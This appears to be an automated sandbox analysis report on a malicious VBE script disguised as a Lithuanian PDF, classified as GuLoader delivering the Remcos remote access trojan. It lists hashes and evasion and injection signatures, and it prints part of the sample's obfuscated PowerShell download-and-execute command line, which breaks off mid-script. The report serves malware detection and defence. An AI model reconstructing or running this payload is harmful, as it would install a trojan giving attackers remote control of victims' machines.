Edit tour
Windows
Analysis Report
LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
Overview
General Information
Sample name: | LSMU CITATA LT 20-11-2024#U00b7pdf.vberenamed because original name is a hash value |
Original sample name: | LSMU CITATA LT 20-11-2024pdf.vbe |
Analysis ID: | 1559542 |
MD5: | df045c185b46e8c2432ea266b0671f86 |
SHA1: | db27134d7be95240a1349bbcd1a1dcfa0dfb3506 |
SHA256: | 27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181 |
Tags: | vbeuser-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7280 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\LSMU CITATA LT 20-11-2024 #U00b7pdf. vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7364 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Subnutr itious Uni nstructedn ess snigve jen Sortil egi #><#Di ectasis Ro dfunktione r Brdriste ns Sangern e #>$Bortf aldenes='O bskniteter s';functio n Allemand es($Erhver vsgeografi en){If ($h ost.Debugg erEnabled) {$nickelo deons=4} f or ($Thimo theuss=$ni ckelodeons ;;$Thimoth euss+=5){i f(!$Erhver vsgeografi en[$Thimot heuss]) { break }$Ad gangskorte nes55+=$Er hvervsgeog rafien[$Th imotheuss] }$Adgangsk ortenes55} function X ylotomies2 07($Sablen de){ .($Do user) ($Sa blende)}$S amandura=A llemandes 'BeteN Tje E inttRace . DelWSten eJustb Fut CBacklTheo IRensEKage nRecat';$T rolls=Alle mandes 'Ko nsMDrivo l luzHvlbipi cklReprl J .naTold/'; $Tereu=All emandes 'N onaTGo.ilB egosEpid1 Opk2';$Tap eline=' Ka t[ Guendel meProit pr o. UkoSAna keMon.r.ea cvla,gI R. fC SumeCor ypCromo er IKjo nTopf tSicum umo aForsN ora SoftgAeace AffiRSpy ] endi:Liga: ,veSRevle YeascMareU BundrSvrni RoulTTi by in oP w nR LumboLaocT Foro zenc ToplOc rvL Bars= Fer$ OvartdiveE ReirB neE Den U';$Tr olls+=Alle mandes ' T ub5Firb.Si ng0Rger Ng le(E,shWSe l iBrs.n L i,dAfproGr aywWronsOp sv H,ksN.r anTB dm Ty r 1Afko0No nf.Unsp0Ch ar; Kab nk uWB skiThu nLose6U s u4Elec;svi n Theox no m6Alge4,ic e;U,ve n.n rKa.evAwfu :Spur1E.vi 3H pe1F sh .Metr0 Enc )afna Bega G Greeel z cPrenkGrap oDekl/Mine 2Aris0Semi 1.ini0tvan 0 Ano1Fr n 0 Sol1alb, inF eini GrnsrSlove ,verfPr vo ImbrxVisu/ ,ide1Alla3 F,is1 He . ,rem0';$Fl oristernes =Allemande s ' BreUPu lssGuide P asrEnso-je stA Br GCu s ENo tnMr keT';$Infi nitively=A llemandes 'NonmhArmv tBekrtSpan p uersWa e :Akry/Soc. / vrdd otr .uciTranv SereStag. SatrgHjero ableoCensg LaplExcie inte.vandc PoetoSu fm Ska/H teu pr mc rk?O vere enxDe capruntoMa rarbro tKn ob=tabudSe ioPropwOs tenBar.llu stoRivea R e dOrga& G eni haedDi th=.lot1 r ekzheadiMe loYStkyxC unCKummjDe .kUDescv.e gij No.9Ac ra9TranQEn a tVa.mXKo laQiracjPo stBPianjTe reAFacex B ihM B osRe gne AdemU saosysi3Co ndELondXBi ll9adonDva pu8Stanj'; $Chroococc oid=Allema ndes 'Malp >';$Douser =Allemande s 'GirgILr ebEPegbx'; $Jakey='Ri sting';$Un depreciato ry='\Malod ourously.d ar';Xyloto mies207 (A llemandes 'Glue$Becl gAfbll Tes oVrisb Inq A lazlNomi :AtroB.eet rI quI .ub sthinKffes =Feb,$Jus eElixNWooh VSvam:Oppu A UnppRan pNo,mdHa v A Ma t s n AAnti+Af.a $LedeuS er NN veDDoku EAtomP Ban rV,teEDada cHjruI Anb A,hilt nno oDoseRRe l Y');Xyloto mies207 (A llemandes 'Abat$Adel GM isLSupp o TarBFag, aC smL .es :HusmoNodu M Ti sIu i aaarst Bis tCannECell =E.en$ Gav ICallnOver fSkumIOver NLapiIUdb, tR ndisabb vweire An. lMissYKobl . U ssSlip PPa,iLRast I S mT ice ( S,o$ egi cDa kHGasm rUnsioOp,u ORe,lC Tur O.patcCoad